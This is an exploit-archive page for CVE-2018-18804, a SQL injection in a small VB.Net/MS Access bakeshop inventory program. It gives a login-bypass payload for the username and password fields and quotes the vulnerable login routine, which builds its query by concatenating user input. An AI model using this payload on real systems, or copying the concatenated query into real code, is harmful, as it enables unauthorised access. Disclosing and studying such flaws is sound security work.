Bakeshop Inventory System In VB.Net / MS Access Database 1.0 SQL Injection

Bakeshop Inventory System In VB.Net / MS Access Database 1.0 SQL Injection: Posted Oct 29, 2018; Authored by Ihsan Sencan; Bakeshop Inventory System in VB.Net and MS Access Database version 1.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; advisories | CVE-2018-18804; SHA-256 | 08e3c0e54a0e19df593015a3983d1f93f61aafd9663e6c838ec7526b765c13ad; Download | Favorite | View

Bakeshop Inventory System In VB.Net / MS Access Database 1.0 SQL Injection

# Exploit Title: Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bakeshopinventory1.0.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18804
 
# POC: 
# 1)
# User: 'or 1=1 or ''='
# Pass: 'or 1=1 or ''='
# 
# https://2.bp.blogspot.com/-xjiRUlpkNGc/W9Ywmp79JpI/AAAAAAAAENs/3UDWxFvuTfcJrEKDU9TUxJRpoT8T6yLLwCLcBGAs/s1600/sql4.png
# 
#[PATH]/include/publicfunction.vb
#....
#237     Public Sub LoginUser(ByVal userid As Object, ByVal pass As Object)
#238         Try
#239             con.Open()
#240 
#241             cmd = New OleDb.OleDbCommand
#242             With cmd
#243                 .Connection = con
#244                 .CommandText = "SELECT * FROM tblUser WHERE U_UNAME ='" & userid.Text & "' AND U_PASS = '" & pass.Text & "'"
#245             End With
#246 
#247             da = New OleDb.OleDbDataAdapter
#248             da.SelectCommand = cmd
#249             dt = New DataTable
#250             da.Fill(dt)
#251 
#252             If dt.Rows.Count > 0 Then
#253 
#254                 If dt.Rows(0).Item("U_TYPE") = "Administrator" Then
#255 
#256                     MsgBox("You login as administrator!!")
#257 
#258                     ShowForm(LoginForm1, Form1)
#259 
#260 
#261                     LoginForm1.Hide()
#262                 ElseIf dt.Rows(0).Item("U_TYPE") = "Staff" Then
#263 
#264                     MsgBox("You login as Staff!!")
#265 
#266                     With Form1
#267                         '.ManageUsersToolStripMenuItem.Visible = False
#268 
#269                     End With
#270 
#271                     ShowForm(LoginForm1, Form1)
#272 
#273 
#274                     LoginForm1.Hide()
#275                 End If 
#276 
#277             Else
#278                 MsgBox("Account does not exists.", MsgBoxStyle.Exclamation)
#279             End If
#280 
#281         Catch ex As Exception
#282 
#283             MsgBox(ex.Message)
#284         Finally
#285             con.Close()
#286             da.Dispose()
#287         End Try
#288     End Sub
#....

Top Authors In Last 30 Days

Red Hat 272 files
indoushka 184 files
Jay Turla 150 files
Ubuntu 90 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 25 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,126)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,592)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,362)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,911)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,882)
UNIX (9,459)
UnixWare (188)
Windows (6,772)
Other

Bakeshop Inventory System In VB.Net / MS Access Database 1.0 SQL Injection

Bakeshop Inventory System In VB.Net / MS Access Database 1.0 SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Bakeshop Inventory System In VB.Net / MS Access Database 1.0 SQL Injection

Share This

Bakeshop Inventory System In VB.Net / MS Access Database 1.0 SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems